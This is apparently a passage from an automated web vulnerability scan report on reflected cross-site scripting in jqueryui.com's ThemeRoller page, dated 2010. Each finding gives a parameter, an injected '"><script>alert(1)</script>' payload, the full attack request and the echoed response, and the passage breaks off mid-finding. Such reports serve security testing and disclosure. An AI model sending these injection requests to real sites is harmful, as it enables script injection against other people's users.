GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD92f8a"><script>alert(1)</script>5c9db817cbc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
eroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD92f8a"><script>alert(1)</script>5c9db817cbc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&b
...[SNIP]...

2.29. http://jqueryui.com/themeroller/ [bgColorHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8955b"><script>alert(1)</script>3d3632ac57f was submitted in the bgColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C8955b"><script>alert(1)</script>3d3632ac57f&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
cHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C8955b"><script>alert(1)</script>3d3632ac57f&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityEr
...[SNIP]...

2.30. http://jqueryui.com/themeroller/ [bgColorHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6591f"><script>alert(1)</script>a2709f92cce was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF6591f"><script>alert(1)</script>a2709f92cce&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:49 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF6591f"><script>alert(1)</script>a2709f92cce&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&bor
...[SNIP]...

2.31. http://jqueryui.com/themeroller/ [bgColorOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddc89"><script>alert(1)</script>3fd82bd44b8 was submitted in the bgColorOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000ddc89"><script>alert(1)</script>3fd82bd44b8&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:58 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000ddc89"><script>alert(1)</script>3fd82bd44b8&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&
...[SNIP]...

2.32. http://jqueryui.com/themeroller/ [bgColorShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a65e5"><script>alert(1)</script>00ab20f4a9f was submitted in the bgColorShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDDa65e5"><script>alert(1)</script>00ab20f4a9f&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:54:02 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
at.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDDa65e5"><script>alert(1)</script>00ab20f4a9f&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*" type="text/css" media="all" />
...[SNIP]...

2.33. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2f2d"><script>alert(1)</script>97f8aa11556 was submitted in the bgImgOpacityActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100d2f2d"><script>alert(1)</script>97f8aa11556&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:13 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100d2f2d"><script>alert(1)</script>97f8aa11556&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333
...[SNIP]...

2.34. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 997f9"><script>alert(1)</script>4169bdc7a36 was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100997f9"><script>alert(1)</script>4169bdc7a36&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:37 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
DD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100997f9"><script>alert(1)</script>4169bdc7a36&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconCo
...[SNIP]...

2.35. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f4cd"><script>alert(1)</script>021c587b46e was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=505f4cd"><script>alert(1)</script>021c587b46e&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
TextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=505f4cd"><script>alert(1)</script>021c587b46e&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=F
...[SNIP]...

2.36. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55e29"><script>alert(1)</script>b8d95e5854a was submitted in the bgImgOpacityError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=10055e29"><script>alert(1)</script>b8d95e5854a&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:53 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=10055e29"><script>alert(1)</script>b8d95e5854a&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png
...[SNIP]...

2.37. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d783"><script>alert(1)</script>2b423fbb9cc was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

